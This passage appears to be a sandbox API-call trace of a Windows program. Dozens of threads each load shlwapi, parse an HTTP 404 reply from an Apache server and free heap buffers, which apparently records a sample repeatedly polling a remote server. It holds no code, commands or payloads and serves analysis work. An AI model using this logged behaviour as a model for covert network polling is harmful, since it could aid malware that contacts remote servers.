hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0337.641] GetProcessHeap () returned 0x690000 [0337.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 631 os_tid = 0x1964 [0337.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.970] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0337.970] GetProcessHeap () returned 0x690000 [0337.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0337.970] GetProcessHeap () returned 0x690000 [0337.970] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0337.970] GetProcessHeap () returned 0x690000 [0337.971] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 632 os_tid = 0x1968 [0338.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.209] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0338.209] GetProcessHeap () returned 0x690000 [0338.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0338.209] GetProcessHeap () returned 0x690000 [0338.209] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0338.209] GetProcessHeap () returned 0x690000 [0338.210] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 633 os_tid = 0x196c [0338.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.363] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0338.363] GetProcessHeap () returned 0x690000 [0338.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0338.363] GetProcessHeap () returned 0x690000 [0338.363] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0338.363] GetProcessHeap () returned 0x690000 [0338.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 634 os_tid = 0x1970 [0338.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.551] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0338.551] GetProcessHeap () returned 0x690000 [0338.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0338.551] GetProcessHeap () returned 0x690000 [0338.551] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0338.551] GetProcessHeap () returned 0x690000 [0338.552] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 635 os_tid = 0x1974 [0338.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.954] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0338.954] GetProcessHeap () returned 0x690000 [0338.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0338.954] GetProcessHeap () returned 0x690000 [0338.954] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0338.954] GetProcessHeap () returned 0x690000 [0338.954] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 636 os_tid = 0x1978 [0339.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.429] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0339.429] GetProcessHeap () returned 0x690000 [0339.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0339.429] GetProcessHeap () returned 0x690000 [0339.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0339.430] GetProcessHeap () returned 0x690000 [0339.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 637 os_tid = 0x197c [0339.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.610] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0339.610] GetProcessHeap () returned 0x690000 [0339.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0339.610] GetProcessHeap () returned 0x690000 [0339.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0339.610] GetProcessHeap () returned 0x690000 [0339.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 638 os_tid = 0x1980 [0339.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0339.825] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0339.825] GetProcessHeap () returned 0x690000 [0339.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0339.825] GetProcessHeap () returned 0x690000 [0339.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0339.825] GetProcessHeap () returned 0x690000 [0339.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 639 os_tid = 0x1984 [0340.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.080] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0340.080] GetProcessHeap () returned 0x690000 [0340.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0340.080] GetProcessHeap () returned 0x690000 [0340.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0340.080] GetProcessHeap () returned 0x690000 [0340.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 640 os_tid = 0x1988 [0340.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.279] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0340.279] GetProcessHeap () returned 0x690000 [0340.279] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0340.279] GetProcessHeap () returned 0x690000 [0340.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0340.279] GetProcessHeap () returned 0x690000 [0340.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 641 os_tid = 0x198c [0340.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.508] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0340.508] GetProcessHeap () returned 0x690000 [0340.508] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0340.508] GetProcessHeap () returned 0x690000 [0340.508] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0340.508] GetProcessHeap () returned 0x690000 [0340.509] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 642 os_tid = 0x1990 [0340.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.718] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0340.718] GetProcessHeap () returned 0x690000 [0340.718] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0340.718] GetProcessHeap () returned 0x690000 [0340.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0340.718] GetProcessHeap () returned 0x690000 [0340.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 643 os_tid = 0x1994 [0341.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.029] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0341.029] GetProcessHeap () returned 0x690000 [0341.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0341.030] GetProcessHeap () returned 0x690000 [0341.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0341.030] GetProcessHeap () returned 0x690000 [0341.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 644 os_tid = 0x1998 [0341.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.316] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0341.316] GetProcessHeap () returned 0x690000 [0341.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0341.316] GetProcessHeap () returned 0x690000 [0341.316] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0341.316] GetProcessHeap () returned 0x690000 [0341.316] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 645 os_tid = 0x199c [0341.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.478] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0341.478] GetProcessHeap () returned 0x690000 [0341.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0341.479] GetProcessHeap () returned 0x690000 [0341.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0341.479] GetProcessHeap () returned 0x690000 [0341.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 646 os_tid = 0x19a0 [0341.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.696] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0341.697] GetProcessHeap () returned 0x690000 [0341.697] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0341.697] GetProcessHeap () returned 0x690000 [0341.697] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0341.697] GetProcessHeap () returned 0x690000 [0341.697] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 647 os_tid = 0x19a4 [0341.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.928] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0341.928] GetProcessHeap () returned 0x690000 [0341.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0341.928] GetProcessHeap () returned 0x690000 [0341.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0341.928] GetProcessHeap () returned 0x690000 [0341.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 648 os_tid = 0x19a8 [0342.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.674] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0342.674] GetProcessHeap () returned 0x690000 [0342.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0342.674] GetProcessHeap () returned 0x690000 [0342.674] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0342.674] GetProcessHeap () returned 0x690000 [0342.674] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 649 os_tid = 0x19ac [0342.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.905] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0342.905] GetProcessHeap () returned 0x690000 [0342.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0342.905] GetProcessHeap () returned 0x690000 [0342.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0342.905] GetProcessHeap () returned 0x690000 [0342.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 650 os_tid = 0x19b0 [0343.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.188] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0343.188] GetProcessHeap () returned 0x690000 [0343.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0343.188] GetProcessHeap () returned 0x690000 [0343.188] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0343.188] GetProcessHeap () returned 0x690000 [0343.188] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 651 os_tid = 0x19b4 [0343.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.391] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0343.391] GetProcessHeap () returned 0x690000 [0343.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0343.391] GetProcessHeap () returned 0x690000 [0343.391] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0343.391] GetProcessHeap () returned 0x690000 [0343.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 652 os_tid = 0x19b8 [0343.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.720] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0343.720] GetProcessHeap () returned 0x690000 [0343.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0343.720] GetProcessHeap () returned 0x690000 [0343.720] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0343.720] GetProcessHeap () returned 0x690000 [0343.720] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 653 os_tid = 0x19bc [0343.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0343.926] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0343.926] GetProcessHeap () returned 0x690000 [0343.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0343.926] GetProcessHeap () returned 0x690000 [0343.926] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0343.926] GetProcessHeap () returned 0x690000 [0343.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 654 os_tid = 0x19c0 [0344.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.169] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0344.169] GetProcessHeap () returned 0x690000 [0344.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0344.170] GetProcessHeap () returned 0x690000 [0344.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0344.170] GetProcessHeap () returned 0x690000 [0344.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 655 os_tid = 0x19c4 [0344.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.377] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0344.377] GetProcessHeap () returned 0x690000 [0344.377] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0344.377] GetProcessHeap () returned 0x690000 [0344.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0344.377] GetProcessHeap () returned 0x690000 [0344.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 656 os_tid = 0x19c8 [0344.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.574] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0344.574] GetProcessHeap () returned 0x690000 [0344.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0344.574] GetProcessHeap () returned 0x690000 [0344.574] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0344.574] GetProcessHeap () returned 0x690000 [0344.575] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 657 os_tid = 0x19cc [0344.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.821] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0344.821] GetProcessHeap () returned 0x690000 [0344.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0344.821] GetProcessHeap () returned 0x690000 [0344.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0344.821] GetProcessHeap () returned 0x690000 [0344.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 658 os_tid = 0x19d0 [0345.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.041] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0345.041] GetProcessHeap () returned 0x690000 [0345.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0345.041] GetProcessHeap () returned 0x690000 [0345.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0345.042] GetProcessHeap () returned 0x690000 [0345.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 659 os_tid = 0x19d4 [0345.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.263] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0345.263] GetProcessHeap () returned 0x690000 [0345.263] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0345.263] GetProcessHeap () returned 0x690000 [0345.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0345.263] GetProcessHeap () returned 0x690000 [0345.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 660 os_tid = 0x19d8 [0345.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.449] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0345.450] GetProcessHeap () returned 0x690000 [0345.450] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae9a0 [0345.450] GetProcessHeap () returned 0x690000 [0345.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae9a0 | out: hHeap=0x690000) returned 1 [0345.450] GetProcessHeap () returned 0x690000 [0345.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 661 os_tid = 0x19dc [0345.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.737] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0345.738] GetProcessHeap () returned 0x690000 [0345.738] 